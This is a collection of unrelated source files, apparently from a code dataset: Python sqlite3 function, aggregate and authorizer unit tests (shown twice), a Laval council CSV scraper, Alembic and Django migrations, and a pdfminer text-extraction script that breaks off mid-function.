val = cur.fetchone()[0]
self.assertEqual(val, 1)
def CheckParamLongLong(self):
cur = self.con.cursor()
cur.execute("select islonglong(?)", (1<<42,))
val = cur.fetchone()[0]
self.assertEqual(val, 1)
def CheckAnyArguments(self):
cur = self.con.cursor()
cur.execute("select spam(?, ?)", (1, 2))
val = cur.fetchone()[0]
self.assertEqual(val, 2)
# Regarding deterministic functions:
#
# Between 3.8.3 and 3.15.0, deterministic functions were only used to
# optimize inner loops, so for those versions we can only test if the
# sqlite machinery has factored out a call or not. From 3.15.0 and onward,
# deterministic functions were permitted in WHERE clauses of partial
    # indices, which allows testing based on syntax instead of the query optimizer.
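    # A minimal sketch of the two behaviors (hypothetical table/index names,
    # using only sqlite3 APIs already exercised in this file):
    #
    #   con = sqlite.connect(":memory:")
    #   con.execute("create table t(c)")
    #   con.create_function("det", 0, lambda: 1, deterministic=True)
    #   # pre-3.15.0: "select det() = det()" may evaluate det() only once;
    #   # 3.15.0+: det() is also accepted in a partial-index WHERE clause:
    #   con.execute("create index i on t(c) where det() is not null")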
@unittest.skipIf(sqlite.sqlite_version_info < (3, 8, 3), "Requires SQLite 3.8.3 or higher")
def CheckFuncNonDeterministic(self):
mock = unittest.mock.Mock(return_value=None)
self.con.create_function("nondeterministic", 0, mock, deterministic=False)
if sqlite.sqlite_version_info < (3, 15, 0):
self.con.execute("select nondeterministic() = nondeterministic()")
self.assertEqual(mock.call_count, 2)
else:
with self.assertRaises(sqlite.OperationalError):
self.con.execute("create index t on test(t) where nondeterministic() is not null")
@unittest.skipIf(sqlite.sqlite_version_info < (3, 8, 3), "Requires SQLite 3.8.3 or higher")
def CheckFuncDeterministic(self):
mock = unittest.mock.Mock(return_value=None)
self.con.create_function("deterministic", 0, mock, deterministic=True)
if sqlite.sqlite_version_info < (3, 15, 0):
self.con.execute("select deterministic() = deterministic()")
self.assertEqual(mock.call_count, 1)
else:
try:
self.con.execute("create index t on test(t) where deterministic() is not null")
except sqlite.OperationalError:
self.fail("Unexpected failure while creating partial index")
@unittest.skipIf(sqlite.sqlite_version_info >= (3, 8, 3), "SQLite < 3.8.3 needed")
def CheckFuncDeterministicNotSupported(self):
with self.assertRaises(sqlite.NotSupportedError):
self.con.create_function("deterministic", 0, int, deterministic=True)
def CheckFuncDeterministicKeywordOnly(self):
with self.assertRaises(TypeError):
self.con.create_function("deterministic", 0, int, True)
class AggregateTests(unittest.TestCase):
def setUp(self):
self.con = sqlite.connect(":memory:")
cur = self.con.cursor()
cur.execute("""
create table test(
t text,
i integer,
f float,
n,
b blob
)
""")
cur.execute("insert into test(t, i, f, n, b) values (?, ?, ?, ?, ?)",
("foo", 5, 3.14, None, memoryview(b"blob"),))
self.con.create_aggregate("nostep", 1, AggrNoStep)
self.con.create_aggregate("nofinalize", 1, AggrNoFinalize)
self.con.create_aggregate("excInit", 1, AggrExceptionInInit)
self.con.create_aggregate("excStep", 1, AggrExceptionInStep)
self.con.create_aggregate("excFinalize", 1, AggrExceptionInFinalize)
self.con.create_aggregate("checkType", 2, AggrCheckType)
self.con.create_aggregate("checkTypes", -1, AggrCheckTypes)
self.con.create_aggregate("mysum", 1, AggrSum)
self.con.create_aggregate("aggtxt", 1, AggrText)
def tearDown(self):
        self.con.close()
def CheckAggrErrorOnCreate(self):
with self.assertRaises(sqlite.OperationalError):
self.con.create_function("bla", -100, AggrSum)
def CheckAggrNoStep(self):
# XXX it's better to raise OperationalError in order to stop
# the query earlier.
cur = self.con.cursor()
with self.assertRaises(sqlite.OperationalError) as cm:
cur.execute("select nostep(t) from test")
self.assertEqual(str(cm.exception), "user-defined aggregate's 'step' method raised error")
def CheckAggrNoFinalize(self):
cur = self.con.cursor()
with self.assertRaises(sqlite.OperationalError) as cm:
cur.execute("select nofinalize(t) from test")
val = cur.fetchone()[0]
self.assertEqual(str(cm.exception), "user-defined aggregate's 'finalize' method raised error")
def CheckAggrExceptionInInit(self):
cur = self.con.cursor()
with self.assertRaises(sqlite.OperationalError) as cm:
cur.execute("select excInit(t) from test")
val = cur.fetchone()[0]
self.assertEqual(str(cm.exception), "user-defined aggregate's '__init__' method raised error")
def CheckAggrExceptionInStep(self):
cur = self.con.cursor()
with self.assertRaises(sqlite.OperationalError) as cm:
cur.execute("select excStep(t) from test")
val = cur.fetchone()[0]
self.assertEqual(str(cm.exception), "user-defined aggregate's 'step' method raised error")
def CheckAggrExceptionInFinalize(self):
cur = self.con.cursor()
with self.assertRaises(sqlite.OperationalError) as cm:
cur.execute("select excFinalize(t) from test")
val = cur.fetchone()[0]
self.assertEqual(str(cm.exception), "user-defined aggregate's 'finalize' method raised error")
def CheckAggrCheckParamStr(self):
cur = self.con.cursor()
cur.execute("select checkTypes('str', ?, ?)", ("foo", str()))
val = cur.fetchone()[0]
self.assertEqual(val, 2)
def CheckAggrCheckParamInt(self):
cur = self.con.cursor()
cur.execute("select checkType('int', ?)", (42,))
val = cur.fetchone()[0]
self.assertEqual(val, 1)
def CheckAggrCheckParamsInt(self):
cur = self.con.cursor()
cur.execute("select checkTypes('int', ?, ?)", (42, 24))
val = cur.fetchone()[0]
self.assertEqual(val, 2)
def CheckAggrCheckParamFloat(self):
cur = self.con.cursor()
cur.execute("select checkType('float', ?)", (3.14,))
val = cur.fetchone()[0]
self.assertEqual(val, 1)
def CheckAggrCheckParamNone(self):
cur = self.con.cursor()
cur.execute("select checkType('None', ?)", (None,))
val = cur.fetchone()[0]
self.assertEqual(val, 1)
def CheckAggrCheckParamBlob(self):
cur = self.con.cursor()
cur.execute("select checkType('blob', ?)", (memoryview(b"blob"),))
val = cur.fetchone()[0]
self.assertEqual(val, 1)
def CheckAggrCheckAggrSum(self):
cur = self.con.cursor()
cur.execute("delete from test")
cur.executemany("insert into test(i) values (?)", [(10,), (20,), (30,)])
cur.execute("select mysum(i) from test")
val = cur.fetchone()[0]
self.assertEqual(val, 60)
def CheckAggrText(self):
cur = self.con.cursor()
for txt in ["foo", "1\x002"]:
with self.subTest(txt=txt):
cur.execute("select aggtxt(?) from test", (txt,))
val = cur.fetchone()[0]
self.assertEqual(val, txt)
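# SQLite consults the authorizer callback for every action a statement wants
# to perform; anything other than SQLITE_OK -- including raised exceptions or
# return values of the wrong type, as the subclasses further down check --
# results in the access being denied.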
class AuthorizerTests(unittest.TestCase):
@staticmethod
def authorizer_cb(action, arg1, arg2, dbname, source):
if action != sqlite.SQLITE_SELECT:
return sqlite.SQLITE_DENY
if arg2 == 'c2' or arg1 == 't2':
return sqlite.SQLITE_DENY
return sqlite.SQLITE_OK
def setUp(self):
self.con = sqlite.connect(":memory:")
self.con.executescript("""
create table t1 (c1, c2);
create table t2 (c1, c2);
insert into t1 (c1, c2) values (1, 2);
insert into t2 (c1, c2) values (4, 5);
""")
# For our security test:
self.con.execute("select c2 from t2")
self.con.set_authorizer(self.authorizer_cb)
def tearDown(self):
pass
def test_table_access(self):
with self.assertRaises(sqlite.DatabaseError) as cm:
self.con.execute("select * from t2")
self.assertIn('prohibited', str(cm.exception))
def test_column_access(self):
with self.assertRaises(sqlite.DatabaseError) as cm:
self.con.execute("select c2 from t1")
self.assertIn('prohibited', str(cm.exception))
class AuthorizerRaiseExceptionTests(AuthorizerTests):
@staticmethod
def authorizer_cb(action, arg1, arg2, dbname, source):
if action != sqlite.SQLITE_SELECT:
raise ValueError
if arg2 == 'c2' or arg1 == 't2':
raise ValueError
return sqlite.SQLITE_OK
class AuthorizerIllegalTypeTests(AuthorizerTests):
@staticmethod
def authorizer_cb(action, arg1, arg2, dbname, source):
if action != sqlite.SQLITE_SELECT:
return 0.0
if arg2 == 'c2' or arg1 == 't2':
return 0.0
return sqlite.SQLITE_OK
class AuthorizerLargeIntegerTests(AuthorizerTests):
@staticmethod
def authorizer_cb(action, arg1, arg2, dbname, source):
if action != sqlite.SQLITE_SELECT:
return 2**32
if arg2 == 'c2' or arg1 == 't2':
return 2**32
return sqlite.SQLITE_OK
def suite():
function_suite = unittest.makeSuite(FunctionTests, "Check")
aggregate_suite = unittest.makeSuite(AggregateTests, "Check")
authorizer_suite = unittest.makeSuite(AuthorizerTests)
return unittest.TestSuite((
function_suite,
aggregate_suite,
authorizer_suite,
unittest.makeSuite(AuthorizerRaiseExceptionTests),
unittest.makeSuite(AuthorizerIllegalTypeTests),
unittest.makeSuite(AuthorizerLargeIntegerTests),
))
def test():
runner = unittest.TextTestRunner()
runner.run(suite())
if __name__ == "__main__":
test()
| 33.755027 | 102 | 0.620667 |
import unittest
import unittest.mock
import sqlite3 as sqlite
def func_returntext():
return "foo"
def func_returntextwithnull():
return "1\x002"
def func_returnunicode():
return "bar"
def func_returnint():
return 42
def func_returnfloat():
return 3.14
def func_returnnull():
return None
def func_returnblob():
return b"blob"
def func_returnlonglong():
return 1<<31
def func_raiseexception():
5/0
def func_isstring(v):
return type(v) is str
def func_isint(v):
return type(v) is int
def func_isfloat(v):
return type(v) is float
def func_isnone(v):
return type(v) is type(None)
def func_isblob(v):
return isinstance(v, (bytes, memoryview))
def func_islonglong(v):
return isinstance(v, int) and v >= 1<<31
def func(*args):
return len(args)
class AggrNoStep:
def __init__(self):
pass
def finalize(self):
return 1
class AggrNoFinalize:
def __init__(self):
pass
def step(self, x):
pass
class AggrExceptionInInit:
def __init__(self):
5/0
def step(self, x):
pass
def finalize(self):
pass
class AggrExceptionInStep:
def __init__(self):
pass
def step(self, x):
5/0
def finalize(self):
return 42
class AggrExceptionInFinalize:
def __init__(self):
pass
def step(self, x):
pass
def finalize(self):
5/0
class AggrCheckType:
def __init__(self):
self.val = None
def step(self, whichType, val):
theType = {"str": str, "int": int, "float": float, "None": type(None),
"blob": bytes}
self.val = int(theType[whichType] is type(val))
def finalize(self):
return self.val
class AggrCheckTypes:
def __init__(self):
self.val = 0
def step(self, whichType, *vals):
theType = {"str": str, "int": int, "float": float, "None": type(None),
"blob": bytes}
for val in vals:
self.val += int(theType[whichType] is type(val))
def finalize(self):
return self.val
class AggrSum:
def __init__(self):
self.val = 0.0
def step(self, val):
self.val += val
def finalize(self):
return self.val
class AggrText:
def __init__(self):
self.txt = ""
def step(self, txt):
self.txt = self.txt + txt
def finalize(self):
return self.txt
class FunctionTests(unittest.TestCase):
def setUp(self):
self.con = sqlite.connect(":memory:")
self.con.create_function("returntext", 0, func_returntext)
self.con.create_function("returntextwithnull", 0, func_returntextwithnull)
self.con.create_function("returnunicode", 0, func_returnunicode)
self.con.create_function("returnint", 0, func_returnint)
self.con.create_function("returnfloat", 0, func_returnfloat)
self.con.create_function("returnnull", 0, func_returnnull)
self.con.create_function("returnblob", 0, func_returnblob)
self.con.create_function("returnlonglong", 0, func_returnlonglong)
self.con.create_function("raiseexception", 0, func_raiseexception)
self.con.create_function("isstring", 1, func_isstring)
self.con.create_function("isint", 1, func_isint)
self.con.create_function("isfloat", 1, func_isfloat)
self.con.create_function("isnone", 1, func_isnone)
self.con.create_function("isblob", 1, func_isblob)
self.con.create_function("islonglong", 1, func_islonglong)
self.con.create_function("spam", -1, func)
self.con.execute("create table test(t text)")
def tearDown(self):
self.con.close()
def CheckFuncErrorOnCreate(self):
with self.assertRaises(sqlite.OperationalError):
self.con.create_function("bla", -100, lambda x: 2*x)
def CheckFuncRefCount(self):
def getfunc():
def f():
return 1
return f
f = getfunc()
globals()["foo"] = f
self.con.create_function("reftest", 0, f)
cur = self.con.cursor()
cur.execute("select reftest()")
def CheckFuncReturnText(self):
cur = self.con.cursor()
cur.execute("select returntext()")
val = cur.fetchone()[0]
self.assertEqual(type(val), str)
self.assertEqual(val, "foo")
def CheckFuncReturnTextWithNullChar(self):
cur = self.con.cursor()
res = cur.execute("select returntextwithnull()").fetchone()[0]
self.assertEqual(type(res), str)
self.assertEqual(res, "1\x002")
def CheckFuncReturnUnicode(self):
cur = self.con.cursor()
cur.execute("select returnunicode()")
val = cur.fetchone()[0]
self.assertEqual(type(val), str)
self.assertEqual(val, "bar")
def CheckFuncReturnInt(self):
cur = self.con.cursor()
cur.execute("select returnint()")
val = cur.fetchone()[0]
self.assertEqual(type(val), int)
self.assertEqual(val, 42)
def CheckFuncReturnFloat(self):
cur = self.con.cursor()
cur.execute("select returnfloat()")
val = cur.fetchone()[0]
self.assertEqual(type(val), float)
if val < 3.139 or val > 3.141:
self.fail("wrong value")
def CheckFuncReturnNull(self):
cur = self.con.cursor()
cur.execute("select returnnull()")
val = cur.fetchone()[0]
self.assertEqual(type(val), type(None))
self.assertEqual(val, None)
def CheckFuncReturnBlob(self):
cur = self.con.cursor()
cur.execute("select returnblob()")
val = cur.fetchone()[0]
self.assertEqual(type(val), bytes)
self.assertEqual(val, b"blob")
def CheckFuncReturnLongLong(self):
cur = self.con.cursor()
cur.execute("select returnlonglong()")
val = cur.fetchone()[0]
self.assertEqual(val, 1<<31)
def CheckFuncException(self):
cur = self.con.cursor()
with self.assertRaises(sqlite.OperationalError) as cm:
cur.execute("select raiseexception()")
cur.fetchone()
self.assertEqual(str(cm.exception), 'user-defined function raised exception')
def CheckParamString(self):
cur = self.con.cursor()
for text in ["foo", str()]:
with self.subTest(text=text):
cur.execute("select isstring(?)", (text,))
val = cur.fetchone()[0]
self.assertEqual(val, 1)
def CheckParamInt(self):
cur = self.con.cursor()
cur.execute("select isint(?)", (42,))
val = cur.fetchone()[0]
self.assertEqual(val, 1)
def CheckParamFloat(self):
cur = self.con.cursor()
cur.execute("select isfloat(?)", (3.14,))
val = cur.fetchone()[0]
self.assertEqual(val, 1)
def CheckParamNone(self):
cur = self.con.cursor()
cur.execute("select isnone(?)", (None,))
val = cur.fetchone()[0]
self.assertEqual(val, 1)
def CheckParamBlob(self):
cur = self.con.cursor()
cur.execute("select isblob(?)", (memoryview(b"blob"),))
val = cur.fetchone()[0]
self.assertEqual(val, 1)
def CheckParamLongLong(self):
cur = self.con.cursor()
cur.execute("select islonglong(?)", (1<<42,))
val = cur.fetchone()[0]
self.assertEqual(val, 1)
def CheckAnyArguments(self):
cur = self.con.cursor()
cur.execute("select spam(?, ?)", (1, 2))
val = cur.fetchone()[0]
self.assertEqual(val, 2)
@unittest.skipIf(sqlite.sqlite_version_info < (3, 8, 3), "Requires SQLite 3.8.3 or higher")
def CheckFuncNonDeterministic(self):
mock = unittest.mock.Mock(return_value=None)
self.con.create_function("nondeterministic", 0, mock, deterministic=False)
if sqlite.sqlite_version_info < (3, 15, 0):
self.con.execute("select nondeterministic() = nondeterministic()")
self.assertEqual(mock.call_count, 2)
else:
with self.assertRaises(sqlite.OperationalError):
self.con.execute("create index t on test(t) where nondeterministic() is not null")
@unittest.skipIf(sqlite.sqlite_version_info < (3, 8, 3), "Requires SQLite 3.8.3 or higher")
def CheckFuncDeterministic(self):
mock = unittest.mock.Mock(return_value=None)
self.con.create_function("deterministic", 0, mock, deterministic=True)
if sqlite.sqlite_version_info < (3, 15, 0):
self.con.execute("select deterministic() = deterministic()")
self.assertEqual(mock.call_count, 1)
else:
try:
self.con.execute("create index t on test(t) where deterministic() is not null")
except sqlite.OperationalError:
self.fail("Unexpected failure while creating partial index")
@unittest.skipIf(sqlite.sqlite_version_info >= (3, 8, 3), "SQLite < 3.8.3 needed")
def CheckFuncDeterministicNotSupported(self):
with self.assertRaises(sqlite.NotSupportedError):
self.con.create_function("deterministic", 0, int, deterministic=True)
def CheckFuncDeterministicKeywordOnly(self):
with self.assertRaises(TypeError):
self.con.create_function("deterministic", 0, int, True)
class AggregateTests(unittest.TestCase):
def setUp(self):
self.con = sqlite.connect(":memory:")
cur = self.con.cursor()
cur.execute("""
create table test(
t text,
i integer,
f float,
n,
b blob
)
""")
cur.execute("insert into test(t, i, f, n, b) values (?, ?, ?, ?, ?)",
("foo", 5, 3.14, None, memoryview(b"blob"),))
self.con.create_aggregate("nostep", 1, AggrNoStep)
self.con.create_aggregate("nofinalize", 1, AggrNoFinalize)
self.con.create_aggregate("excInit", 1, AggrExceptionInInit)
self.con.create_aggregate("excStep", 1, AggrExceptionInStep)
self.con.create_aggregate("excFinalize", 1, AggrExceptionInFinalize)
self.con.create_aggregate("checkType", 2, AggrCheckType)
self.con.create_aggregate("checkTypes", -1, AggrCheckTypes)
self.con.create_aggregate("mysum", 1, AggrSum)
self.con.create_aggregate("aggtxt", 1, AggrText)
def tearDown(self):
pass
def CheckAggrErrorOnCreate(self):
with self.assertRaises(sqlite.OperationalError):
self.con.create_function("bla", -100, AggrSum)
def CheckAggrNoStep(self):
cur = self.con.cursor()
with self.assertRaises(sqlite.OperationalError) as cm:
cur.execute("select nostep(t) from test")
self.assertEqual(str(cm.exception), "user-defined aggregate's 'step' method raised error")
def CheckAggrNoFinalize(self):
cur = self.con.cursor()
with self.assertRaises(sqlite.OperationalError) as cm:
cur.execute("select nofinalize(t) from test")
val = cur.fetchone()[0]
self.assertEqual(str(cm.exception), "user-defined aggregate's 'finalize' method raised error")
def CheckAggrExceptionInInit(self):
cur = self.con.cursor()
with self.assertRaises(sqlite.OperationalError) as cm:
cur.execute("select excInit(t) from test")
val = cur.fetchone()[0]
self.assertEqual(str(cm.exception), "user-defined aggregate's '__init__' method raised error")
def CheckAggrExceptionInStep(self):
cur = self.con.cursor()
with self.assertRaises(sqlite.OperationalError) as cm:
cur.execute("select excStep(t) from test")
val = cur.fetchone()[0]
self.assertEqual(str(cm.exception), "user-defined aggregate's 'step' method raised error")
def CheckAggrExceptionInFinalize(self):
cur = self.con.cursor()
with self.assertRaises(sqlite.OperationalError) as cm:
cur.execute("select excFinalize(t) from test")
val = cur.fetchone()[0]
self.assertEqual(str(cm.exception), "user-defined aggregate's 'finalize' method raised error")
def CheckAggrCheckParamStr(self):
cur = self.con.cursor()
cur.execute("select checkTypes('str', ?, ?)", ("foo", str()))
val = cur.fetchone()[0]
self.assertEqual(val, 2)
def CheckAggrCheckParamInt(self):
cur = self.con.cursor()
cur.execute("select checkType('int', ?)", (42,))
val = cur.fetchone()[0]
self.assertEqual(val, 1)
def CheckAggrCheckParamsInt(self):
cur = self.con.cursor()
cur.execute("select checkTypes('int', ?, ?)", (42, 24))
val = cur.fetchone()[0]
self.assertEqual(val, 2)
def CheckAggrCheckParamFloat(self):
cur = self.con.cursor()
cur.execute("select checkType('float', ?)", (3.14,))
val = cur.fetchone()[0]
self.assertEqual(val, 1)
def CheckAggrCheckParamNone(self):
cur = self.con.cursor()
cur.execute("select checkType('None', ?)", (None,))
val = cur.fetchone()[0]
self.assertEqual(val, 1)
def CheckAggrCheckParamBlob(self):
cur = self.con.cursor()
cur.execute("select checkType('blob', ?)", (memoryview(b"blob"),))
val = cur.fetchone()[0]
self.assertEqual(val, 1)
def CheckAggrCheckAggrSum(self):
cur = self.con.cursor()
cur.execute("delete from test")
cur.executemany("insert into test(i) values (?)", [(10,), (20,), (30,)])
cur.execute("select mysum(i) from test")
val = cur.fetchone()[0]
self.assertEqual(val, 60)
def CheckAggrText(self):
cur = self.con.cursor()
for txt in ["foo", "1\x002"]:
with self.subTest(txt=txt):
cur.execute("select aggtxt(?) from test", (txt,))
val = cur.fetchone()[0]
self.assertEqual(val, txt)
class AuthorizerTests(unittest.TestCase):
@staticmethod
def authorizer_cb(action, arg1, arg2, dbname, source):
if action != sqlite.SQLITE_SELECT:
return sqlite.SQLITE_DENY
if arg2 == 'c2' or arg1 == 't2':
return sqlite.SQLITE_DENY
return sqlite.SQLITE_OK
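    # The authorizer must return sqlite.SQLITE_OK to allow an operation,
    # sqlite.SQLITE_DENY to reject it with an error, or sqlite.SQLITE_IGNORE
    # to silently replace the affected column value with NULL.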
def setUp(self):
self.con = sqlite.connect(":memory:")
self.con.executescript("""
create table t1 (c1, c2);
create table t2 (c1, c2);
insert into t1 (c1, c2) values (1, 2);
insert into t2 (c1, c2) values (4, 5);
""")
self.con.execute("select c2 from t2")
self.con.set_authorizer(self.authorizer_cb)
def tearDown(self):
pass
def test_table_access(self):
with self.assertRaises(sqlite.DatabaseError) as cm:
self.con.execute("select * from t2")
self.assertIn('prohibited', str(cm.exception))
def test_column_access(self):
with self.assertRaises(sqlite.DatabaseError) as cm:
self.con.execute("select c2 from t1")
self.assertIn('prohibited', str(cm.exception))
class AuthorizerRaiseExceptionTests(AuthorizerTests):
@staticmethod
def authorizer_cb(action, arg1, arg2, dbname, source):
if action != sqlite.SQLITE_SELECT:
raise ValueError
if arg2 == 'c2' or arg1 == 't2':
raise ValueError
return sqlite.SQLITE_OK
class AuthorizerIllegalTypeTests(AuthorizerTests):
@staticmethod
def authorizer_cb(action, arg1, arg2, dbname, source):
if action != sqlite.SQLITE_SELECT:
return 0.0
if arg2 == 'c2' or arg1 == 't2':
return 0.0
return sqlite.SQLITE_OK
class AuthorizerLargeIntegerTests(AuthorizerTests):
@staticmethod
def authorizer_cb(action, arg1, arg2, dbname, source):
if action != sqlite.SQLITE_SELECT:
return 2**32
if arg2 == 'c2' or arg1 == 't2':
return 2**32
return sqlite.SQLITE_OK
def suite():
function_suite = unittest.makeSuite(FunctionTests, "Check")
aggregate_suite = unittest.makeSuite(AggregateTests, "Check")
authorizer_suite = unittest.makeSuite(AuthorizerTests)
return unittest.TestSuite((
function_suite,
aggregate_suite,
authorizer_suite,
unittest.makeSuite(AuthorizerRaiseExceptionTests),
unittest.makeSuite(AuthorizerIllegalTypeTests),
unittest.makeSuite(AuthorizerLargeIntegerTests),
))
def test():
runner = unittest.TextTestRunner()
runner.run(suite())
if __name__ == "__main__":
test()
| true | true |
1c4a96188ff3db551b42c8a2d3e9be167f0e99f7 | 653 | py | Python | server/user/migrations/0006_auto_20201019_2248.py | MetLee/hackergame | 571b5407e0644169a2f9b3907a0a1d93138ba436 | [
"MIT"
] | 48 | 2018-09-30T11:07:52.000Z | 2021-12-07T03:32:59.000Z | server/user/migrations/0006_auto_20201019_2248.py | MetLee/hackergame | 571b5407e0644169a2f9b3907a0a1d93138ba436 | [
"MIT"
] | 100 | 2018-10-13T18:37:25.000Z | 2021-11-11T12:14:45.000Z | server/user/migrations/0006_auto_20201019_2248.py | MetLee/hackergame | 571b5407e0644169a2f9b3907a0a1d93138ba436 | [
"MIT"
] | 11 | 2018-10-08T14:59:33.000Z | 2022-03-02T03:21:09.000Z | # Generated by Django 3.1.2 on 2020-10-19 14:48
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('user', '0005_auto_20191011_1842'),
]
operations = [
migrations.AlterModelOptions(
name='user',
options={'default_permissions': (), 'permissions': [('full', '管理个人信息'), ('view_ustc', '查看中国科学技术大学个人信息'), ('view_zju', '查看浙江大学个人信息'), ('view_hit', '查看哈尔滨工业大学个人信息'), ('view_xjtu', '查看西安交通大学个人信息'), ('view_cqu', '查看重庆大学个人信息'), ('view_bupt', '查看北京邮电大学个人信息'), ('view_jlu', '查看吉林大学个人信息'), ('view_neu', '查看东北大学个人信息'), ('view_nuaa', '查看南京航空航天大学个人信息')]},
),
]
| 36.277778 | 356 | 0.623277 |
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('user', '0005_auto_20191011_1842'),
]
operations = [
migrations.AlterModelOptions(
name='user',
options={'default_permissions': (), 'permissions': [('full', '管理个人信息'), ('view_ustc', '查看中国科学技术大学个人信息'), ('view_zju', '查看浙江大学个人信息'), ('view_hit', '查看哈尔滨工业大学个人信息'), ('view_xjtu', '查看西安交通大学个人信息'), ('view_cqu', '查看重庆大学个人信息'), ('view_bupt', '查看北京邮电大学个人信息'), ('view_jlu', '查看吉林大学个人信息'), ('view_neu', '查看东北大学个人信息'), ('view_nuaa', '查看南京航空航天大学个人信息')]},
),
]
| true | true |
1c4a96d25b3a08d0d02147c25f00e9fdc0faa420 | 1,458 | py | Python | ca_qc_laval/people.py | dcycle/scrapers-ca | 4c7a6cd01d603221b5b3b7a400d2e5ca0c6e916f | [
"MIT"
] | null | null | null | ca_qc_laval/people.py | dcycle/scrapers-ca | 4c7a6cd01d603221b5b3b7a400d2e5ca0c6e916f | [
"MIT"
] | null | null | null | ca_qc_laval/people.py | dcycle/scrapers-ca | 4c7a6cd01d603221b5b3b7a400d2e5ca0c6e916f | [
"MIT"
] | null | null | null | # coding: utf-8
from utils import CSVScraper
class LavalPersonScraper(CSVScraper):
# https://www.donneesquebec.ca/recherche/fr/dataset/liste-des-elus
csv_url = 'https://www.donneesquebec.ca/recherche/dataset/8fe69713-fade-4751-a0b4-7e57a81886b1/resource/bb38e19e-26ab-495c-a0f7-ed6b3268b6e6/download/cusersapp.netappdatalocaltemp288c1490-df30-472a-8170-dd06728f449alistedeselus2013-2017.csv'
encoding = 'utf-8-sig'
locale = 'fr'
# Laval also removes accents and cedillas from data.
corrections = {
'district name': {
'Concorde - Bois-de-Boulogne': 'Concorde-Bois-de-Boulogne',
"L'Abord-a-Plouffe": 'Abord-à-Plouffe',
"L'Oree-des-bois": "L'Orée-des-Bois",
'Laval-les-Iles': 'Laval-les-Îles',
'Marc-Aurele-Fortin': 'Marc-Aurèle-Fortin',
'Saint-Francois': 'Saint-François',
'Sainte-Dorothee': 'Sainte-Dorothée',
},
}
    # Absurdly, Laval has decided "les en-têtes ne comportent pas de
    # caractères accentués ou d'espaces" (headers contain no accented
    # characters or spaces) and includes a byte order mark.
def header_converter(self, s):
s = super(LavalPersonScraper, self).header_converter(s.replace('-', ' '))
return {
'role': 'primary role',
'prenom': 'first name',
'localite': 'locality',
'telephone': 'phone',
'telecopieur': 'fax',
'url photo': 'photo url',
}.get(s, s)
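    # e.g. 'prenom' -> 'first name'; assuming the base converter also
    # lower-cases headers, 'URL-Photo' becomes 'url photo' -> 'photo url'.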
| 41.657143 | 245 | 0.620027 | from utils import CSVScraper
class LavalPersonScraper(CSVScraper):
csv_url = 'https://www.donneesquebec.ca/recherche/dataset/8fe69713-fade-4751-a0b4-7e57a81886b1/resource/bb38e19e-26ab-495c-a0f7-ed6b3268b6e6/download/cusersapp.netappdatalocaltemp288c1490-df30-472a-8170-dd06728f449alistedeselus2013-2017.csv'
encoding = 'utf-8-sig'
locale = 'fr'
corrections = {
'district name': {
'Concorde - Bois-de-Boulogne': 'Concorde-Bois-de-Boulogne',
"L'Abord-a-Plouffe": 'Abord-à-Plouffe',
"L'Oree-des-bois": "L'Orée-des-Bois",
'Laval-les-Iles': 'Laval-les-Îles',
'Marc-Aurele-Fortin': 'Marc-Aurèle-Fortin',
'Saint-Francois': 'Saint-François',
'Sainte-Dorothee': 'Sainte-Dorothée',
},
}
    # Absurdly, Laval has decided "les en-têtes ne comportent pas de
    # caractères accentués ou d'espaces" (headers contain no accented
    # characters or spaces) and includes a byte order mark.
def header_converter(self, s):
s = super(LavalPersonScraper, self).header_converter(s.replace('-', ' '))
return {
'role': 'primary role',
'prenom': 'first name',
'localite': 'locality',
'telephone': 'phone',
'telecopieur': 'fax',
'url photo': 'photo url',
}.get(s, s)
| true | true |
1c4a970d54f96d0345653b8eb6c51e13009e1d1c | 414 | py | Python | migrations/versions/384da3b88896_new_contact_email.py | clld/waab | 9693da8887cf8498a47bc41250a2a048595f89f3 | [
"Apache-2.0"
] | 2 | 2015-05-11T13:29:04.000Z | 2017-12-23T04:15:02.000Z | migrations/versions/384da3b88896_new_contact_email.py | clld/waab | 9693da8887cf8498a47bc41250a2a048595f89f3 | [
"Apache-2.0"
] | null | null | null | migrations/versions/384da3b88896_new_contact_email.py | clld/waab | 9693da8887cf8498a47bc41250a2a048595f89f3 | [
"Apache-2.0"
] | 1 | 2015-12-06T22:03:18.000Z | 2015-12-06T22:03:18.000Z | """new contact email
Revision ID: 384da3b88896
Revises: 55912b4a9d56
Create Date: 2015-12-09 11:35:03.872107
"""
# revision identifiers, used by Alembic.
revision = '384da3b88896'
down_revision = '55912b4a9d56'
branch_labels = None
depends_on = None
from alembic import op
import sqlalchemy as sa
def upgrade():
op.execute("update dataset set contact = '[email protected]'")
def downgrade():
pass
| 16.56 | 67 | 0.736715 |
revision = '384da3b88896'
down_revision = '55912b4a9d56'
branch_labels = None
depends_on = None
from alembic import op
import sqlalchemy as sa
def upgrade():
op.execute("update dataset set contact = '[email protected]'")
def downgrade():
pass
| true | true |
1c4a978548c2fd3c6dc15d9d6849941890ca2470 | 1,984 | py | Python | COS498_FinalPrj/extr_pdf.py | melkimble/COS498 | c09ab1ee61f46ebd7b8b9a645787e474df62c3e2 | [
"MIT"
] | null | null | null | COS498_FinalPrj/extr_pdf.py | melkimble/COS498 | c09ab1ee61f46ebd7b8b9a645787e474df62c3e2 | [
"MIT"
] | null | null | null | COS498_FinalPrj/extr_pdf.py | melkimble/COS498 | c09ab1ee61f46ebd7b8b9a645787e474df62c3e2 | [
"MIT"
] | null | null | null | '''
https://stackoverflow.com/questions/26494211/extracting-text-from-a-pdf-file-using-pdfminer-in-python
https://github.com/pdfminer/pdfminer.six
'''
import io
import os
from pdfminer.pdfinterp import PDFResourceManager, PDFPageInterpreter
from pdfminer.converter import TextConverter
from pdfminer.layout import LAParams
from pdfminer.pdfpage import PDFPage
def convert_pdf_to_txt(path):
rsrcmgr = PDFResourceManager()
retstr = io.StringIO()
codec = 'utf-8'
laparams = LAParams()
device = TextConverter(rsrcmgr, retstr, codec=codec, laparams=laparams)
fp = open(path, 'rb')
interpreter = PDFPageInterpreter(rsrcmgr, device)
password = ""
maxpages = 0
caching = True
pagenos = set()
for page in PDFPage.get_pages(fp, pagenos, maxpages=maxpages,
password=password,
caching=caching,
check_extractable=True):
interpreter.process_page(page)
text = retstr.getvalue()
fp.close()
device.close()
retstr.close()
return text
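# Each call to interpreter.process_page() renders one page's text into the
# shared StringIO buffer, so the returned string concatenates all pages.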
def pdfs2Array(testDataFolder):
# empty array that will contain all parsed pdf files for testing.
parsed_pdfs = []
fname=[]
for pdf in os.listdir(testDataFolder):
if pdf.endswith(".pdf"):
try:
ThePDFFile = (os.path.join(testDataFolder, pdf))
# pdf file converted to text
